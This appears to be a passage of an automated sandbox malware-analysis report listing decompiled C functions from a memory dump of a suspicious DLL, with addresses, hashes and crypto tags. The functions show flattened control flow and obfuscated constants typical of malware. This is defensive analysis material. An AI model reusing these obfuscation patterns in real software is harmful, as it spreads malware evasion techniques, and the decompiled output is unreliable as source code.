                                                                                                          0x02af0c14
                                                                                                          0x02af0c1a
                                                                                                          0x02af0c1f
                                                                                                          0x02af0c29

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: WLX
                                                                                                          • API String ID: 0-2077286540
                                                                                                          • Opcode ID: b94b1f32627560e7e3bebf5b4d80886b5e9b19d90dbb90a2e0b071273a2a2c24
                                                                                                          • Instruction ID: 5531a595c65341e00a4d1f72329d2ddbd4eed4527fa96991488145975f322e6d
                                                                                                          • Opcode Fuzzy Hash: b94b1f32627560e7e3bebf5b4d80886b5e9b19d90dbb90a2e0b071273a2a2c24
                                                                                                          • Instruction Fuzzy Hash: 0441F0B1D00209EFCF05DFE4C94A8EEBBB6FB48304F208149E912B7250D3B94A558F90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AFFBDE, Relevance: 1.3, Strings: 1, Instructions: 95COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 95%
                                                                                                          			E02AFFBDE() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _t97;
				void* _t99;
				intOrPtr _t100;
				signed int _t108;
				signed int _t109;
				void* _t111;

				_v44 = _v44 & 0x00000000;
				_v40 = _v40 & 0x00000000;
				_v48 = 0xd22319;
				_v20 = 0x8c11a4;
				_v20 = _v20 ^ 0x18a8aba7;
				_t108 = 0xa;
				_v20 = _v20 / _t108;
				_v20 = _v20 ^ 0x026f5dce;
				_v16 = 0xc2c77c;
				_t99 = 0xb09cdbf;
				_v16 = _v16 | 0x0f3eeb6c;
				_t109 = 0x25;
				_v16 = _v16 / _t109;
				_v16 = _v16 * 0x35;
				_v16 = _v16 ^ 0x16ecca7d;
				_v12 = 0x9a8850;
				_v12 = _v12 * 0x3d;
				_v12 = _v12 + 0xffff2448;
				_v12 = _v12 + 0xffff902b;
				_v12 = _v12 ^ 0x24dbb777;
				_v8 = 0xd2df60;
				_v8 = _v8 + 0xffff203f;
				_v8 = _v8 | 0xa0e0e7e8;
				_v8 = _v8 << 6;
				_v8 = _v8 ^ 0x3c71d6f5;
				_v32 = 0x56890f;
				_v32 = _v32 << 0xa;
				_v32 = _v32 + 0x42ee;
				_v32 = _v32 ^ 0x5a20a45b;
				_v28 = 0x745af2;
				_v28 = _v28 + 0x7057;
				_v28 = _v28 * 0x1d;
				_v28 = _v28 ^ 0x0d34271a;
				_v36 = 0xe2682;
				_v36 = _v36 >> 3;
				_v36 = _v36 ^ 0x000bc26f;
				_v24 = 0x784a24;
				_v24 = _v24 + 0x8efc;
				_v24 = _v24 >> 6;
				_v24 = _v24 ^ 0x000a24d7;
				do {
					while(_t99 != 0x4881f76) {
						if(_t99 == 0xb09cdbf) {
							_push(_t99);
							_push(_t99);
							_t97 = E02AEC5D8(0x124);
							_t111 = _t111 + 0xc;
							 *0x2b0621c = _t97;
							_t99 = 0x4881f76;
							continue;
						}
						goto L5;
					}
					_t100 =  *0x2b0621c; // 0x0
					E02AF9DF5(_t100 + 4, _v32, _v28, _v36, _v24);
					_t111 = _t111 + 0xc;
					_t99 = 0x6dda74a;
					L5:
				} while (_t99 != 0x6dda74a);
				return 1;
			}




















                                                                                                          0x02affbe4
                                                                                                          0x02affbea
                                                                                                          0x02affbee
                                                                                                          0x02affbf5
                                                                                                          0x02affbfc
                                                                                                          0x02affc0b
                                                                                                          0x02affc10
                                                                                                          0x02affc15
                                                                                                          0x02affc21
                                                                                                          0x02affc28
                                                                                                          0x02affc2a
                                                                                                          0x02affc39
                                                                                                          0x02affc41
                                                                                                          0x02affc48
                                                                                                          0x02affc4b
                                                                                                          0x02affc52
                                                                                                          0x02affc5d
                                                                                                          0x02affc60
                                                                                                          0x02affc67
                                                                                                          0x02affc6e
                                                                                                          0x02affc75
                                                                                                          0x02affc7c
                                                                                                          0x02affc83
                                                                                                          0x02affc8a
                                                                                                          0x02affc8e
                                                                                                          0x02affc95
                                                                                                          0x02affc9c
                                                                                                          0x02affca0
                                                                                                          0x02affca7
                                                                                                          0x02affcae
                                                                                                          0x02affcb5
                                                                                                          0x02affcc0
                                                                                                          0x02affcc3
                                                                                                          0x02affcca
                                                                                                          0x02affcd1
                                                                                                          0x02affcd5
                                                                                                          0x02affcdc
                                                                                                          0x02affce3
                                                                                                          0x02affcea
                                                                                                          0x02affcee
                                                                                                          0x02affcf5
                                                                                                          0x02affcf5
                                                                                                          0x02affcfb
                                                                                                          0x02affd09
                                                                                                          0x02affd0a
                                                                                                          0x02affd10
                                                                                                          0x02affd15
                                                                                                          0x02affd18
                                                                                                          0x02affd1d
                                                                                                          0x00000000
                                                                                                          0x02affd1d
                                                                                                          0x00000000
                                                                                                          0x02affcfb
                                                                                                          0x02affd2a
                                                                                                          0x02affd36
                                                                                                          0x02affd3b
                                                                                                          0x02affd3e
                                                                                                          0x02affd40
                                                                                                          0x02affd40
                                                                                                          0x02affd4d

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $Jx
                                                                                                          • API String ID: 0-2488101295
                                                                                                          • Opcode ID: 273938d1bd1ac78b193a615ffed856c5be4fd5c01b17cc1a1ab373cdc41534bc
                                                                                                          • Instruction ID: 579eed28ea6833b3fe5c8902b4812909e26379c1de1d0bd8dbe32064055a26c5
                                                                                                          • Opcode Fuzzy Hash: 273938d1bd1ac78b193a615ffed856c5be4fd5c01b17cc1a1ab373cdc41534bc
                                                                                                          • Instruction Fuzzy Hash: 3D412571D4021AABDF48CFE5C98A5EEBBB1FB44318F208159D512B6290D7B81A458F90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AE7078, Relevance: 1.3, Strings: 1, Instructions: 94COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 34%
                                                                                                          			E02AE7078(void* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _t109;
				signed int _t113;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				signed int _t117;
				signed int _t118;
				void* _t132;
				void* _t133;
				signed int _t134;

				_v12 = 0x8f98c8;
				_v12 = _v12 >> 1;
				_v12 = _v12 << 0x10;
				_v12 = _v12 ^ 0x6b25fb67;
				_v12 = _v12 ^ 0xa7412f1a;
				_v8 = 0xcf53a8;
				_v8 = _v8 + 0xffff4190;
				_v8 = _v8 << 6;
				_v8 = _v8 ^ 0xcc79c588;
				_v8 = _v8 ^ 0xffd9b9f8;
				_v32 = 0xdc21b3;
				_t133 = __ecx;
				_t113 = 0x53;
				_v32 = _v32 / _t113;
				_v32 = _v32 ^ 0x0002aeef;
				_v20 = 0xa54b66;
				_t114 = 0x25;
				_v20 = _v20 / _t114;
				_v20 = _v20 << 4;
				_v20 = _v20 ^ 0x00488e30;
				_v28 = 0xf9718f;
				_v28 = _v28 | 0xd1e9f83c;
				_v28 = _v28 + 0xbce;
				_v28 = _v28 ^ 0xd1f9aa01;
				_v16 = 0x596927;
				_t115 = 0x70;
				_v16 = _v16 / _t115;
				_t116 = 0x65;
				_v16 = _v16 / _t116;
				_t117 = 0x1e;
				_v16 = _v16 / _t117;
				_v16 = _v16 ^ 0x0002780a;
				_v24 = 0x48f141;
				_v24 = _v24 << 0xe;
				_v24 = _v24 >> 1;
				_v24 = _v24 ^ 0x1e282004;
				_v36 = 0x9232a3;
				_t118 = 0x42;
				_push(_t118);
				_v36 = _v36 / _t118;
				_v36 = _v36 ^ 0x00023701;
				_push(_t118);
				_t109 = E02AFCCA0(_v24, _v36);
				_push(_t133);
				_t134 = _t109;
				_push(_t134);
				_push(_v16);
				_t132 = 3;
				E02AEE404(_v28, _t132);
				 *((short*)(_t133 + _t134 * 2)) = 0;
				return 0;
			}





















                                                                                                          0x02ae707e
                                                                                                          0x02ae7087
                                                                                                          0x02ae708a
                                                                                                          0x02ae708e
                                                                                                          0x02ae7095
                                                                                                          0x02ae709c
                                                                                                          0x02ae70a3
                                                                                                          0x02ae70aa
                                                                                                          0x02ae70ae
                                                                                                          0x02ae70b5
                                                                                                          0x02ae70bc
                                                                                                          0x02ae70ca
                                                                                                          0x02ae70cc
                                                                                                          0x02ae70d1
                                                                                                          0x02ae70d6
                                                                                                          0x02ae70dd
                                                                                                          0x02ae70e7
                                                                                                          0x02ae70ec
                                                                                                          0x02ae70f1
                                                                                                          0x02ae70f5
                                                                                                          0x02ae70fc
                                                                                                          0x02ae7103
                                                                                                          0x02ae710a
                                                                                                          0x02ae7111
                                                                                                          0x02ae7118
                                                                                                          0x02ae7122
                                                                                                          0x02ae7127
                                                                                                          0x02ae712f
                                                                                                          0x02ae7134
                                                                                                          0x02ae713c
                                                                                                          0x02ae7141
                                                                                                          0x02ae7146
                                                                                                          0x02ae714d
                                                                                                          0x02ae7154
                                                                                                          0x02ae7158
                                                                                                          0x02ae715b
                                                                                                          0x02ae7162
                                                                                                          0x02ae716c
                                                                                                          0x02ae716f
                                                                                                          0x02ae7170
                                                                                                          0x02ae7173
                                                                                                          0x02ae7186
                                                                                                          0x02ae718d
                                                                                                          0x02ae7192
                                                                                                          0x02ae7193
                                                                                                          0x02ae7195
                                                                                                          0x02ae7196
                                                                                                          0x02ae719b
                                                                                                          0x02ae719f
                                                                                                          0x02ae71a9
                                                                                                          0x02ae71b2

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 'iY
                                                                                                          • API String ID: 0-1691070665
                                                                                                          • Opcode ID: 6788c65911eecd76a1228675ca9b2fbe269b5cbae0b502254479bb4ad135f5f6
                                                                                                          • Instruction ID: 65c75ccdb731135b6c29f4bb0ea685393b1d8bf3c258a4b671a98e06ac461141
                                                                                                          • Opcode Fuzzy Hash: 6788c65911eecd76a1228675ca9b2fbe269b5cbae0b502254479bb4ad135f5f6
                                                                                                          • Instruction Fuzzy Hash: E3413372E00219EBEF08DFA5D94A9EEFBB2FB44304F208059D111BB290D7B51A15CF90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AF6187, Relevance: 1.3, Strings: 1, Instructions: 71COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 97%
                                                                                                          			E02AF6187(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _t52;
				void* _t56;
				void* _t58;
				void* _t59;
				void* _t61;
				intOrPtr _t62;
				signed int* _t64;

				_t58 = __ecx;
				_t64 =  &_v36;
				_v12 = 0x9a6334;
				_t59 = 0x428baaa;
				_v8 = 0x1104ea;
				_t62 = 0;
				_v4 = 0;
				_v28 = 0xb15b0c;
				_t61 = __ecx;
				_v28 = _v28 * 0x1d;
				_v28 = _v28 ^ 0xf86649d6;
				_v28 = _v28 ^ 0xec767c96;
				_v36 = 0x38db19;
				_v36 = _v36 ^ 0x5bdda26a;
				_v36 = _v36 + 0xffff005e;
				_v36 = _v36 | 0xaa371973;
				_v36 = _v36 ^ 0xfbf0c1f1;
				_v32 = 0x2e8edf;
				_v32 = _v32 | 0x3500a324;
				_v32 = _v32 ^ 0x353f0f34;
				_v32 = _v32 >> 0xd;
				_v32 = _v32 ^ 0x000af409;
				_v16 = 0xfc04c2;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 ^ 0x000f83ee;
				_v20 = 0xce9672;
				_v20 = _v20 | 0xcae5864f;
				_v20 = _v20 ^ 0xcae41209;
				_v24 = 0x20b296;
				_v24 = _v24 | 0x98e19d34;
				_v24 = _v24 ^ 0x98e5764e;
				do {
					while(_t59 != 0x2638d08) {
						if(_t59 == 0x428baaa) {
							_t59 = 0x994f089;
							continue;
						} else {
							if(_t59 == 0x994f089) {
								_push(_t58);
								_t56 = E02AF07F0();
								_t64 =  &(_t64[1]);
								_t59 = 0x2638d08;
								_t62 = _t62 + _t56;
								continue;
							}
						}
						goto L7;
					}
					_t58 = _t61 + 4;
					_t52 = E02AFBE8C(_t58, _v32, _v16, _v20, _v24);
					_t64 =  &(_t64[3]);
					_t59 = 0xb7af90a;
					_t62 = _t62 + _t52;
					L7:
				} while (_t59 != 0xb7af90a);
				return _t62;
			}



















                                                                                                          0x02af6187
                                                                                                          0x02af6187
                                                                                                          0x02af618a
                                                                                                          0x02af6192
                                                                                                          0x02af6197
                                                                                                          0x02af61a2
                                                                                                          0x02af61a9
                                                                                                          0x02af61b2
                                                                                                          0x02af61c0
                                                                                                          0x02af61c2
                                                                                                          0x02af61c6
                                                                                                          0x02af61ce
                                                                                                          0x02af61d6
                                                                                                          0x02af61de
                                                                                                          0x02af61e6
                                                                                                          0x02af61ee
                                                                                                          0x02af61f6
                                                                                                          0x02af61fe
                                                                                                          0x02af6206
                                                                                                          0x02af620e
                                                                                                          0x02af6216
                                                                                                          0x02af621b
                                                                                                          0x02af6223
                                                                                                          0x02af622b
                                                                                                          0x02af6230
                                                                                                          0x02af6238
                                                                                                          0x02af6240
                                                                                                          0x02af6248
                                                                                                          0x02af6250
                                                                                                          0x02af6258
                                                                                                          0x02af6260
                                                                                                          0x02af6268
                                                                                                          0x02af6268
                                                                                                          0x02af6272
                                                                                                          0x02af628f
                                                                                                          0x00000000
                                                                                                          0x02af6274
                                                                                                          0x02af6276
                                                                                                          0x02af6280
                                                                                                          0x02af6281
                                                                                                          0x02af6286
                                                                                                          0x02af6289
                                                                                                          0x02af628b
                                                                                                          0x00000000
                                                                                                          0x02af628b
                                                                                                          0x02af6276
                                                                                                          0x00000000
                                                                                                          0x02af6272
                                                                                                          0x02af6297
                                                                                                          0x02af62a6
                                                                                                          0x02af62ab
                                                                                                          0x02af62ae
                                                                                                          0x02af62b3
                                                                                                          0x02af62b5
                                                                                                          0x02af62b5
                                                                                                          0x02af62c6

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ^
                                                                                                          • API String ID: 0-1590793086
                                                                                                          • Opcode ID: 15f427db74853c52db19e36ecd5d1196a4b9b3c1a225ff2705a6343ab6a06753
                                                                                                          • Instruction ID: fd834f6ea32ff3719a9dbe039bdee3a8fcf517cb4c6fa3c4524025a4e03d21a6
                                                                                                          • Opcode Fuzzy Hash: 15f427db74853c52db19e36ecd5d1196a4b9b3c1a225ff2705a6343ab6a06753
                                                                                                          • Instruction Fuzzy Hash: 373165716093428B8758CF64958500FFBE5BBD4B48F004A1DF595A2220D7B9DA1A8B93
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AFCAD5, Relevance: 1.3, Strings: 1, Instructions: 69COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 90%
                                                                                                          			E02AFCAD5(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				void* _t69;
				intOrPtr _t76;
				signed int _t78;
				signed int _t86;
				intOrPtr* _t87;

				_t87 = _a8;
				_t86 = _a12;
				_push(_t86);
				_push(_t87);
				_push(_a4);
				E02AFFE29(_t69);
				_v32 = _v32 & 0x00000000;
				_v28 = _v28 & 0x00000000;
				_v36 = 0xc93ec5;
				_a8 = 0xcab84b;
				_a8 = _a8 >> 1;
				_a8 = _a8 | 0xee18e3b9;
				_a8 = _a8 ^ 0xee71da74;
				_v16 = 0x1dfffe;
				_v16 = _v16 | 0x90f94c10;
				_v16 = _v16 ^ 0x90ff99a5;
				_v12 = 0xe4edc;
				_v12 = _v12 ^ 0xcefa836b;
				_v12 = _v12 ^ 0xcefa5bee;
				_a12 = 0xedd33e;
				_a12 = _a12 ^ 0xf7b2c6ca;
				_a12 = _a12 | 0xdc5ffd20;
				_a12 = _a12 ^ 0xadaf2279;
				_a12 = _a12 ^ 0x52f8ee07;
				_v8 = 0x14e12c;
				_t78 = 6;
				_v8 = _v8 * 0xa;
				_v8 = _v8 / _t78;
				_v8 = _v8 ^ 0x002f50e1;
				_v24 = 0x3584ef;
				_v24 = _v24 ^ 0xd7b39bf3;
				_v24 = _v24 ^ 0xd7855a87;
				_v20 = 0x11ef3f;
				_v20 = _v20 ^ 0xad5d4e81;
				_v20 = _v20 ^ 0xad432fff;
				E02AF0A90(_a8, _v16, _v12, _t86, _a12,  *((intOrPtr*)(_t87 + 4)));
				E02AFC9B0(_v8,  *((intOrPtr*)(_t86 + 0x34)), _v24,  *((intOrPtr*)(_t87 + 4)),  *_t87, _v20);
				_t76 =  *((intOrPtr*)(_t87 + 4));
				 *((intOrPtr*)(_t86 + 0x34)) =  *((intOrPtr*)(_t86 + 0x34)) + _t76;
				return _t76;
			}
















                                                                                                          0x02afcadc
                                                                                                          0x02afcae0
                                                                                                          0x02afcae3
                                                                                                          0x02afcae4
                                                                                                          0x02afcae5
                                                                                                          0x02afcaea
                                                                                                          0x02afcaef
                                                                                                          0x02afcaf5
                                                                                                          0x02afcaf9
                                                                                                          0x02afcb00
                                                                                                          0x02afcb07
                                                                                                          0x02afcb0a
                                                                                                          0x02afcb11
                                                                                                          0x02afcb18
                                                                                                          0x02afcb1f
                                                                                                          0x02afcb26
                                                                                                          0x02afcb2d
                                                                                                          0x02afcb34
                                                                                                          0x02afcb3b
                                                                                                          0x02afcb42
                                                                                                          0x02afcb49
                                                                                                          0x02afcb50
                                                                                                          0x02afcb57
                                                                                                          0x02afcb5e
                                                                                                          0x02afcb65
                                                                                                          0x02afcb72
                                                                                                          0x02afcb73
                                                                                                          0x02afcb7b
                                                                                                          0x02afcb7e
                                                                                                          0x02afcb85
                                                                                                          0x02afcb8c
                                                                                                          0x02afcb93
                                                                                                          0x02afcb9a
                                                                                                          0x02afcba1
                                                                                                          0x02afcba8
                                                                                                          0x02afcbbf
                                                                                                          0x02afcbd5
                                                                                                          0x02afcbda
                                                                                                          0x02afcbe0
                                                                                                          0x02afcbe8

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: P/
                                                                                                          • API String ID: 0-4116444305
                                                                                                          • Opcode ID: 6f020d937ebaa896c9d230a2bf1ecbcee9e07464a67b9e6fe3dda2eabbf40348
                                                                                                          • Instruction ID: 8af9ea6415df8ba2e590a29d3224e724596ec4d12165d90daee323917cdb8464
                                                                                                          • Opcode Fuzzy Hash: 6f020d937ebaa896c9d230a2bf1ecbcee9e07464a67b9e6fe3dda2eabbf40348
                                                                                                          • Instruction Fuzzy Hash: 2031437190130AEFCF48CFA1CA4699FBBB1FF44304F108549EA26A6220C7B59B61DF81
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02B02B09, Relevance: 1.3, Strings: 1, Instructions: 57COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 85%
                                                                                                          			E02B02B09(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t59;
				signed int _t68;
				void* _t74;

				_push(_a8);
				_t74 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02AFFE29(_t59);
				_v8 = 0x93d6ec;
				_v8 = _v8 << 7;
				_v8 = _v8 + 0xffff3f9a;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x00010f7f;
				_v16 = 0x446197;
				_v16 = _v16 >> 4;
				_v16 = _v16 + 0xffff9430;
				_v16 = _v16 ^ 0x00039bf5;
				_v12 = 0x6cea88;
				_v12 = _v12 >> 1;
				_t68 = 0x54;
				_v12 = _v12 / _t68;
				_v12 = _v12 + 0x3de4;
				_v12 = _v12 ^ 0x00083458;
				_v20 = 0x13246e;
				_v20 = _v20 << 0xf;
				_v20 = _v20 << 0xf;
				_v20 = _v20 ^ 0x800a585e;
				_v20 = 0x9dc8c5;
				_v20 = _v20 + 0xe5f4;
				_v20 = _v20 + 0xffffcd2d;
				_v20 = _v20 ^ 0x00910c57;
				_v12 = 0x6d0957;
				_v12 = _v12 << 1;
				_v12 = _v12 ^ 0xc39cd689;
				_v12 = _v12 ^ 0x6e460985;
				_v12 = _v12 ^ 0xad0dfd5a;
				return E02AF0C2A(E02B028EB(), _v20, _t68, _v12, _t74);
			}










                                                                                                          0x02b02b10
                                                                                                          0x02b02b13
                                                                                                          0x02b02b15
                                                                                                          0x02b02b18
                                                                                                          0x02b02b19
                                                                                                          0x02b02b1a
                                                                                                          0x02b02b1f
                                                                                                          0x02b02b29
                                                                                                          0x02b02b2f
                                                                                                          0x02b02b36
                                                                                                          0x02b02b3a
                                                                                                          0x02b02b41
                                                                                                          0x02b02b48
                                                                                                          0x02b02b4c
                                                                                                          0x02b02b53
                                                                                                          0x02b02b5a
                                                                                                          0x02b02b61
                                                                                                          0x02b02b69
                                                                                                          0x02b02b6c
                                                                                                          0x02b02b6f
                                                                                                          0x02b02b76
                                                                                                          0x02b02b7d
                                                                                                          0x02b02b84
                                                                                                          0x02b02b88
                                                                                                          0x02b02b8c
                                                                                                          0x02b02b93
                                                                                                          0x02b02b9a
                                                                                                          0x02b02ba1
                                                                                                          0x02b02ba8
                                                                                                          0x02b02baf
                                                                                                          0x02b02bb6
                                                                                                          0x02b02bb9
                                                                                                          0x02b02bc0
                                                                                                          0x02b02bc7
                                                                                                          0x02b02bef

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Wm
                                                                                                          • API String ID: 0-1953712011
                                                                                                          • Opcode ID: 5f458415f00c48274a736efb525796b6a242fc0a9122d131060991abe7e8c2f8
                                                                                                          • Instruction ID: 63a3a667e8222af1fba54dc4cde3b38f843fae02ebf5146b37bbf49b29b9d69e
                                                                                                          • Opcode Fuzzy Hash: 5f458415f00c48274a736efb525796b6a242fc0a9122d131060991abe7e8c2f8
                                                                                                          • Instruction Fuzzy Hash: D721C071D01319EBDB559FE4D94A4DEBFB1FB00318F108699E46966250D7B50B88DF80
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AE1CA1, Relevance: .1, Instructions: 113COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 92%
                                                                                                          			E02AE1CA1(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v520;
				char _v552;
				signed int _v556;
				intOrPtr _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				void* _t99;
				void* _t109;
				void* _t112;
				signed int _t126;
				signed int _t127;
				signed int* _t131;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02AFFE29(_t99);
				_v556 = _v556 & 0x00000000;
				_t131 =  &(( &_v600)[4]);
				_v560 = 0x11afe4;
				_v572 = 0x705fac;
				_v572 = _v572 >> 3;
				_t112 = 0x5dfd87c;
				_v572 = _v572 ^ 0x000e0be5;
				_v600 = 0x66ffbc;
				_v600 = _v600 << 5;
				_v600 = _v600 + 0xffffdeb6;
				_v600 = _v600 >> 3;
				_v600 = _v600 ^ 0x019de099;
				_v564 = 0xb3cc88;
				_v564 = _v564 >> 0xc;
				_v564 = _v564 ^ 0x000695d5;
				_v576 = 0xedaac2;
				_v576 = _v576 | 0x8d88b270;
				_t126 = 0xa;
				_v576 = _v576 / _t126;
				_v576 = _v576 ^ 0x0e34170c;
				_v568 = 0xd34644;
				_v568 = _v568 << 0xd;
				_v568 = _v568 ^ 0x68c9882a;
				_v596 = 0xa76cec;
				_v596 = _v596 + 0xf564;
				_v596 = _v596 | 0x7a23d379;
				_t127 = 0x75;
				_v596 = _v596 / _t127;
				_v596 = _v596 ^ 0x010c78ac;
				_v588 = 0xf6d5ff;
				_v588 = _v588 ^ 0x1e4d5d29;
				_v588 = _v588 | 0xf865f4c1;
				_v588 = _v588 ^ 0xfef0a2a0;
				_v592 = 0xc86264;
				_v592 = _v592 + 0xffff9c97;
				_v592 = _v592 << 0xb;
				_v592 = _v592 + 0x20dd;
				_v592 = _v592 ^ 0x3ff909a0;
				_v584 = 0x196fa2;
				_v584 = _v584 >> 3;
				_v584 = _v584 | 0xe537cc6c;
				_v584 = _v584 ^ 0xe53246df;
				_v580 = 0xb6108b;
				_v580 = _v580 + 0xfdd;
				_v580 = _v580 << 3;
				_v580 = _v580 ^ 0x05ba306f;
				do {
					while(_t112 != 0x5b30f91) {
						if(_t112 == 0x5dfd87c) {
							_t109 = E02AFFE2A(_v600, _v564, _v572,  &_v552);
							_t112 = 0xb74f612;
							continue;
						} else {
							if(_t112 == 0xb74f612) {
								_t109 = E02AE2F80( &_v520, _v576, _v568, _v596);
								_t131 =  &(_t131[3]);
								_t112 = 0x5b30f91;
								continue;
							}
						}
						goto L7;
					}
					E02AF06FE(_v588, _v592, _a8,  &_v520, _v584, _t112,  &_v552, _v580);
					_t131 =  &(_t131[6]);
					_t112 = 0xf20a46f;
					L7:
				} while (_t112 != 0xf20a46f);
				return _t109;
			}























                                                                                                          0x02ae1cab
                                                                                                          0x02ae1cb2
                                                                                                          0x02ae1cb9
                                                                                                          0x02ae1cba
                                                                                                          0x02ae1cbb
                                                                                                          0x02ae1cc0
                                                                                                          0x02ae1cc5
                                                                                                          0x02ae1cc8
                                                                                                          0x02ae1cd2
                                                                                                          0x02ae1cdf
                                                                                                          0x02ae1ce4
                                                                                                          0x02ae1ce6
                                                                                                          0x02ae1cf3
                                                                                                          0x02ae1d00
                                                                                                          0x02ae1d05
                                                                                                          0x02ae1d0d
                                                                                                          0x02ae1d12
                                                                                                          0x02ae1d1a
                                                                                                          0x02ae1d22
                                                                                                          0x02ae1d27
                                                                                                          0x02ae1d2f
                                                                                                          0x02ae1d37
                                                                                                          0x02ae1d45
                                                                                                          0x02ae1d4a
                                                                                                          0x02ae1d50
                                                                                                          0x02ae1d58
                                                                                                          0x02ae1d60
                                                                                                          0x02ae1d65
                                                                                                          0x02ae1d6d
                                                                                                          0x02ae1d75
                                                                                                          0x02ae1d7d
                                                                                                          0x02ae1d89
                                                                                                          0x02ae1d91
                                                                                                          0x02ae1d95
                                                                                                          0x02ae1d9d
                                                                                                          0x02ae1da5
                                                                                                          0x02ae1dad
